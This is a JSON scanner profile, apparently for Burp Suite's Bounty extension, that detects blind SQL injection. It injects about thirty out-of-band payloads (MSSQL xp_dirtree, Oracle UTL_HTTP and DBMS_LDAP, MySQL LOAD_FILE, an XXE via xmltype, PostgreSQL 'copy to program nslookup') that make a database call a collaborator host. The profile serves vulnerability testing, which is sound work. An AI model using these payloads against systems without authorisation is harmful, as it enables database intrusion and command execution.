[
  {
    "profile_name": "Blind_SQLi",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,OR (SELECT LOAD_FILE(\u0027\\\\\\\\\u0027,\u0027{BH}\u0027))",
          "true,OR (SELECT UTL_HTTP.REQUEST(\u0027http://{BH}\u0027) FROM DUAL)",
          "true,OR (SELECT UTL_INADDR.get_host_addr((\u0027http://{BH}\u0027) FROM DUAL)",
          "true,OR (SELECT SYS.DBMS_LDAP.INIT(\u0027{BH}\u0027,80) FROM DUAL)",
          "true,OR (SELECT UTL_HTTP.REQUEST(\u0027http://{BH}\u0027) FROM DUAL)",
          "true,OR (SELECT UTL_INADDR.get_host_addr((\u0027http://{BH}\u0027) FROM DUAL)",
          "true,OR (SELECT SYS.DBMS_LDAP.INIT(\u0027{BH}\u0027,80) FROM DUAL)",
          "true,OR (declare @q varchar(99);set @q\u003d\u0027\\\\{BH}\u0027; exec master.dbo.xp_dirtree @q;)--",
          "true,OR declare @q varchar(99);set @q\u003d\u0027\\\\{BH}\u0027; exec master.dbo.xp_dirtree @q;--",
          "true,OR exec master..xp_dirtree \u0027//{BH}/a\u0027",
          "true,OR SELECT extractvalue(xmltype(\u0027\u003c?xml version\u003d\"1.0\" encoding\u003d\"UTF-8\"?\u003e\u003c!DOCTYPE root [ \u003c!ENTITY % remote SYSTEM \"http://{BH}/\"\u003e %remote;]\u003e\u0027),\u0027/l\u0027) FROM dual",
          "true,OR copy (SELECT \u0027\u0027) to program \u0027nslookup {BH}\u0027",
          "true,OR LOAD_FILE(\u0027\\\\\\\\{BH}\\\\a\u0027)",
          "true,OR SELECT ... INTO OUTFILE \u0027\\\\\\\\{BH}\\a\u0027",
          "true,;declare @q varchar(99);set @q\u003d\u0027\\\\{BH}\u0027; exec master.dbo.xp_dirtree @q;--",
          "true,;(SELECT LOAD_FILE(\u0027\\\\\\\\\u0027,\u0027{BH}\u0027))",
          "true,;(SELECT UTL_HTTP.REQUEST(\u0027http://{BH}\u0027) FROM DUAL)",
          "true,;(SELECT UTL_INADDR.get_host_addr((\u0027http://{BH}\u0027) FROM DUAL)",
          "true,;(SELECT SYS.DBMS_LDAP.INIT(\u0027{BH}\u0027,80) FROM DUAL)",
          "true,;exec master..xp_dirtree \u0027//{BH}/a\u0027",
          "true,;SELECT extractvalue(xmltype(\u0027\u003c?xml version\u003d\"1.0\" encoding\u003d\"UTF-8\"?\u003e\u003c!DOCTYPE root [ \u003c!ENTITY % remote SYSTEM \"http://{BH}/\"\u003e %remote;]\u003e\u0027),\u0027/l\u0027) FROM dual",
          "true,;copy (SELECT \u0027\u0027) to program \u0027nslookup {BH}\u0027",
          "true,;LOAD_FILE(\u0027\\\\\\\\{BH}\\\\a\u0027)",
          "true,;SELECT ... INTO OUTFILE \u0027\\\\\\\\{BH}\\a\u0027",
          "true,and (SELECT LOAD_FILE(\u0027\\\\\\\\\u0027,\u0027{BH}\u0027))",
          "true,and (SELECT UTL_HTTP.REQUEST(\u0027http://{BH}\u0027) FROM DUAL)",
          "true,and (SELECT UTL_INADDR.get_host_addr((\u0027http://{BH}\u0027) FROM DUAL)",
          "true,and (SELECT SYS.DBMS_LDAP.INIT(\u0027{BH}\u0027,80) FROM DUAL)",
          "true,and (declare @q varchar(99);set @q\u003d\u0027\\\\{BH}\u0027; exec master.dbo.xp_dirtree @q;)--",
          "true,and declare @q varchar(99);set @q\u003d\u0027\\\\{BH}\u0027; exec master.dbo.xp_dirtree @q;--",
          "true,and exec master..xp_dirtree \u0027//{BH}/a\u0027",
          "true,and SELECT extractvalue(xmltype(\u0027\u003c?xml version\u003d\"1.0\" encoding\u003d\"UTF-8\"?\u003e\u003c!DOCTYPE root [ \u003c!ENTITY % remote SYSTEM \"http://{BH}/\"\u003e %remote;]\u003e\u0027),\u0027/l\u0027) FROM dual",
          "true,and copy (SELECT \u0027\u0027) to program \u0027nslookup {BH}\u0027"
        ],
        "payloads_file": "",
        "payload_position": "append",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "param_name_multi_part_attr",
          "referer",
          "origin",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Blind Host,,"
        ],
        "redir_type": "always",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "Blind_SQLi",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "SQLi",
      "All"
    ]
  }
]